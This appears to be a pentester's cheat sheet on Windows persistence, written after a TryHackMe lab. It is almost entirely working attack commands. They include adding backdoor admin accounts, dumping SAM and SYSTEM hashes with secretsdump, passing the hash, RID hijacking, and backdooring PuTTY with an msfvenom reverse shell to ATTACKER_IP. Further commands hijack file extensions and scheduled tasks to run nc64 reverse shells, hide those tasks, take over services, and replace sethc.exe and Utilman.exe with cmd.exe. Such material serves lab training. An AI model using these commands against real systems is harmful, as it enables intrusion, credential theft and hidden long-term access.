Windows Persistence

Best Resource on the planet: https://tryhackme.com/room/windowslocalpersistence

Elevating Unpriv Accounts

Add users to groups

# Add to admin
net localgroup administrators oscar42 /add

# Add to backup operators. Can read/write any mem location or reg
net localgroup "Backup Operators" oscar42 /add

# Allow RDP for backup operators 
net localgroup "Remote Management Users" oscar42 /add

# Disable LocalAccountTokenFilterPolicy to allow use of remote admin
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

Conn to group using Evil-WinRM

# Connect to box
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321

# Check Groups 
whoami /groups

# Download for secrets dump
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak

# Dump hashes using Impacket
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

# Login using admin hash (last part of hashdump)
evil-winrm -i 10.10.0.1 -u Administrator -H 1cea1d7e8899f69e89088c4cb4bbdaa3

Special Privileges and Security Descriptors

List of privs: https://docs.microsoft.com/...

Name

Description

SeBackupPrivilege

The user can read any file in the system, ignoring any DACL in place.

SeRestorePrivilege

The user can write any file in the system, ignoring any DACL in place.

# Export current config
secedit /export /cfg config.inf

# Add user to lines in config
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42

# Convert modified file to DB and load it to sys

secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf

# To allow RDP, Open GUI, Add oscar42 user, Allow Full controll permission
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

# You can now connect to Winrm
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321

Relative ID (RID) Hijacking

# List RIDs of all users
wmic useraccount get name,sid

>> wmic useraccount get name,sid
Name                SID
Administrator       S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount      S-1-5-21-1966530601-3185510712-10604624-503
Guest               S-1-5-21-1966530601-3185510712-10604624-501
oscar42             S-1-5-21-1966530601-3185510712-10604624-1010
WDAGUtilityAccount  S-1-5-21-1966530601-3185510712-10604624-504

The important bit is the 1010 at the end of the SID for the user oscar42. This is the RID, and we need to change it to the same value as the administrator, 500.

# open regedit as System using PSEXEC
PsExec64.exe -i -s regedit

Now we need to modify the HKLM\SAM\SAM\Domains\Account\Users\ key for the user we want to elevate. Convert the RID to HEX to find the user. In this case, 1010 converts to 0x3f2.

Modify the F key to have the admins bytes, 0x1f4 with the byte order reversed.

Backdooring Files

Using MSFVenom

# Add a backdoor to Putty that executes a payload on run
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

Hijacking File Extensions

File extensions are located at HKLM\Software\Classes\. We can then select a extension. Selecting the .txt extension reveals a link to the class txtfile. We can then change the command ran when opening this file type at Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command

Backdoor PS1 to run a revshell on notepad launch:

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]

we can then save this script to c:\Windows\system32\backdoor.ps1, and change the reg key to powershell -windowstyle hidden C:\windows\system32\backdoor2.ps1 %1. Opening any .txt file will now execute our payload.

Services

Auto change admin pass

This will create a service that changes the admin password to passwd123 on startup.

sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto
sc.exe start THMservice

MSFVenom

On the attackers machine:

# Creates a malicious service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe

On the target machine:

# After dropping the exe into C:\Windows\
sc.exe create malService binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start malService

Service hijacking

# List all services. We want to look for a stopped service to avoid
# detection from a AV monitoring services
sc.exe query state=all

# Query for information on a discovered service
sc.exe qc service1

# Change binary path for service 
sc.exe config service1 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"

# now you can either wait for the service to start itself, or start it manually with
sc.exe start service1

Task Scheduler

# Create a task to establish a connection every min
schtasks /create /sc minute /mo 1 /tn TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM

# Check if task was created 
schtasks /query /tn taskbackdoor

Hide task

A task can be hidden by deleting its service descriptor (SD). Service descriptors can be viewed at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\. Next, select the service you created and delete the SD record for it.

Logon Triggered Persistence

Startup Folder

# Programs stored in
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
# Will be ran on startup

Registry

# Create a REG_EXPAND_SZ in the registry path with a link to the application
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

# Add a link to the exe after the comma in UserInit
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\

# Add a key called "UserInitMprLogonScript" with a path to the exe
HKCU\Environment

Logon Screen

Stickeykeys

takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
# Shift 5 times at lockscreen will now pop a shell

Utilman

takeown /f c:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
# Pressing the accessability settings will now pop a shell

PreviousWindows PrivEsc NextExfiltration

Last updated 3 years ago